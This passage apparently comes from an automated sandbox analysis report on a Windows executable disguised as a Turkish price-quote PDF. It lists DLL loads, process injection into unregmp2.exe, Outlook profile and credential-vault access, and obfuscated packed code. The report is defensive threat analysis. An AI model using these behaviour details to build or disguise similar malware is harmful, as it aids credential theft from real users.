Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: unregmp2.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: owYCvHvzfwuh.exe, 00000008.00000002.3778328626.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3778593047.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: unregmp2.pdbGCTL source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 0_2_075D4425 pushfd ; retf 0_2_075D4426
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00418893 push 00000067h; ret 7_2_00418910
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00418907 push 00000067h; ret 7_2_00418910
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004051F1 push es; iretd 7_2_004051F3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004052E7 push F2DD9F13h; ret 7_2_004052EC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004053C6 push ebx; retf 7_2_004053CA
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004183DA push 00000018h; ret 7_2_004183DC
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_004084EE push ss; ret 7_2_004084FA
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00403480 push eax; ret 7_2_00403482
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00401DA0 push es; retf 7_2_00401DA3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00401DA8 push es; retf 7_2_00401DA3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0041A66B push ecx; ret 7_2_0041A67D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0041A69C push ecx; ret 7_2_0041A67D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0040BF29 pushfd ; retf 7_2_0040BF31
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_0040A7DF push ds; retf 7_2_0040A7E0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_00407784 push esi; retf 7_2_00407789
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AA225F pushad ; ret 7_2_01AA27F9
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AA27FA pushad ; ret 7_2_01AA27F9
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD09AD push ecx; mov dword ptr [esp], ecx 7_2_01AD09B6
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AA283D push eax; iretd 7_2_01AA2858
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AA1368 push eax; iretd 7_2_01AA1369
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AA9939 push es; iretd 7_2_01AA9940
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D009AD push ecx; mov dword ptr [esp], ecx 9_2_04D009B6
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BC4301 push esi; retf 9_2_00BC4306
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BC8AA6 pushfd ; retf 9_2_00BC8AAE
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BD4F57 push 00000018h; ret 9_2_00BD4F59
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BC506B push ss; ret 9_2_00BC5077
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BD71F3 push ecx; ret 9_2_00BD71FA
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BD7130 push ds; retf 7E3Eh 9_2_00BD719F
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BDD102 pushfd ; iretd 9_2_00BDD103
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BDD15E push esp; iretd 9_2_00BDD165
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: section name: .text entropy: 7.983864382590907
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
